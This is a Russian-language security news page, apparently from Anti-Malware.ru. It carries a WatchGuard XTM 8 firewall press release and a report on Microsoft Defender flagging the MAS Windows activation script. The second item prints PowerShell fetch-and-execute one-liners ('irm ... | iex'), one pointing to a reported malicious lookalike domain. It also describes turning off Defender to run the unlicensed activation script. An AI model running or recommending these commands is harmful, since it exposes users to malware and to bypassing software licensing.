WatchGuard расширил функционал межсетевых экранов WatchGuard XTM 8

WatchGuard расширил функционал межсетевых экранов WatchGuard XTM 8

Компания WatchGuard Technologies, расширила функционал устройств WatchGuard серии XTM 8, предоставляя пользователям все возможности межсетевых экранов нового поколения.  Теперь межсетевые экраны нового поколения доступны как для малых, так и для средних компаний. Функционал WatchGuard серии XTM 8 расширен такими возможностями, как усовершенствованное межсетевое экранирование, управление приложениями и предотвращение сетевых вторжений (IPS).

С активированными сервисами Application Control и IPS межсетевые экраны WatchGuard XTM 8 достигают пропускной способности 1,2 Гбит/с, что обеспечивает высокий уровень безопасности без ущерба общей производительности. 

«До недавнего времени межсетевые экраны нового поколения были доступны только для крупных компаний, - говорит Роджер Клорезе (Roger Klorese), директор по управлению продуктами компании WatchGuard Technologies. - Теперь использовать межсетевые экраны нового поколения для защиты сети могут не только крупные компании, но также малый и средний бизнес. Устройства WatchGuard серии XTM 8 предоставляют компаниям самые современные инструменты, позволяющие обеспечить полную безопасность сетей, а также данных и приложений».

Сервис WatchGuard Application Control обеспечивает всесторонний детальный контроль над приложениями Web 2.0, такими как Facebook, Twitter, LinkedIn и множеством других. WatchGuard Application Control позволяет защищать сети от угроз нового вида, которые создаются злоумышленниками для популярных приложений.

Кроме этого, межсетевые экраны WatchGuard серии XTM 8 предоставляют высокий уровень защиты от угроз, которые скрыты в зашифрованных по протоколу HTTPS потоках данных. С помощью технологии WatchGuard HTTPS Proxy администраторы могут перехватывать, просматривать и восстанавливать потоки данных, проходящие по протоколу HTTPS.

Как отмечают в компании, учитывая, что прогнозируемый темп роста VoIP составляет более 20% в год, сегодня эта технология представляет серьёзную угрозу для корпоративных сетей. В связи с этим возрастает число DoS атак на VoIP сети и атак вида «Vishing» (Fishing + VoIP). Решения WatchGuard серии XTM 8 обеспечивают безопасность для протоколов SIP и H.323 на прикладном уровне.

Одной из основных угроз для корпоративных систем являются ботнет-сети. Поскольку многие из них используют те же протоколы, что и бизнес-приложения, системные администраторы сталкиваются с проблемой выбора: полностью заблокировать бизнес-приложения или подвергнуть сеть риску заражения. Решения WatchGuard XTM 8 позволяют системным администраторам не блокировать бизнес-приложения и в то же время быть уверенными, что сеть надёжно защищена от атак. Межсетевые экраны WatchGuard не только идентифицируют приложения, но и работают на уровне сетевых портов и протоколов.

Высокий уровень безопасности и такие возможности, как Multi-WAN failover (использование нескольких внешних каналов от разных провайдеров), балансировка нагрузки, кластеризация и возможность обновить младшую модель в линейке устройств до старшей, делают межсетевые экраны WatchGuard серии XTM 8 оптимальным решением для компаний любого размера, считают разработчики.

«Малый и средний бизнес сталкивается с теми же угрозами в сфере информационной безопасности, что и крупные корпорации. Зачастую небольшие организации даже более уязвимы к атакам на сеть в связи с ограниченным объемом их ИТ-ресурсов, - отмечает Ирина Момчилович, генеральный директор Rainbow Security. - Расширение функционала решений WatchGuard XTM 8 и предоставление возможностей межсетевых экранов нового поколения малым и средним компаниям позволит им построить систему комплексной защиты информационной среды, используя оптимальное соотношение стоимости предоставляемых услуг и их качества. Устройства WatchGuard сертифицированы по 3 классу ФСТЭК и по классу К2 включительно в информационных системах персональных данных, что делает их одними из наиболее востребованных и актуальных решений на российским рынке в свете ФЗ-152».

На территории России продукция WatchGuard Technologies реализуется компанией Rainbow Security через сеть сертифицированных партнеров.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru